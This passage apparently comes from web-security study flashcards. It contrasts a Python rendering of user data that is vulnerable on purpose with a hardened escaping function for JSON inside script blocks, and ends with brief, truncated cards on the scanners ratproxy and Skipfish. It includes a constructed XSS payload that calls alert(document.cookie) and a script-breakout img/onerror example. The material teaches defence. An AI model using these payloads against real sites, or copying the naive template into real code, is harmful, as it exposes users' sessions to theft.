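Added example (not code from the original flashcards) of that injection against a page that embeds user data in a JSON literal inside a script block, with the vulnerable rendering next to a hardened one. The naive template pastes the value in unescaped, so the close-and-comment payload breaks out of the literal; the safe version serializes with json.dumps and additionally escapes the characters that can terminate a script block. The template and payload are constructed.

```python
import json

NAIVE_TEMPLATE = '<script>var user = {"name": "%s", "role": "guest"};</script>'


def render_naive(name: str) -> str:
    """Vulnerable: the value is pasted into a JSON literal with no escaping."""
    return NAIVE_TEMPLATE % name


def json_for_html(value) -> str:
    """Hardened: serialize with json.dumps (quotes, backslashes and, with ensure_ascii,
    U+2028/U+2029 are escaped), then escape <, > and & so '</script>' cannot end the block."""
    s = json.dumps(value)
    return s.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def render_safe(name: str) -> str:
    return "<script>var user = %s;</script>" % json_for_html({"name": name, "role": "guest"})


def extract_literal(html: str) -> str:
    """Pull out whatever sits between 'var user = ' and the final ';</script>'."""
    start = html.index("var user = ") + len("var user = ")
    end = html.rindex(";</script>")
    return html[start:end]


def literal_intact(html: str) -> bool:
    """The literal is intact only if it still parses as a single JSON value."""
    try:
        json.loads(extract_literal(html))
        return True
    except json.JSONDecodeError:
        return False


# Constructed attacker value: close the string and the object early, run JS, comment out the tail.
PAYLOAD = '"}; alert(document.cookie); //'

if __name__ == "__main__":
    for label, html in (("naive", render_naive(PAYLOAD)), ("safe", render_safe(PAYLOAD))):
        print(label, "intact:", literal_intact(html))
        print("   ", html)
```

Escaping "<" as \u003c is what stops a value like </script><img src=x onerror=...> from closing the block, because the HTML parser sees the script body before the JavaScript engine decodes the escape; plain json.dumps alone does not do this.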
Automated scanner that mainly acts as a passive proxy and collects data on a site as you walk it.
ratproxy
Free, open-source automated scanner that performs adaptive scanning, brute forcing, and handles multiple languages at once (PHP, ASPX, etc.). Uses
Skipfish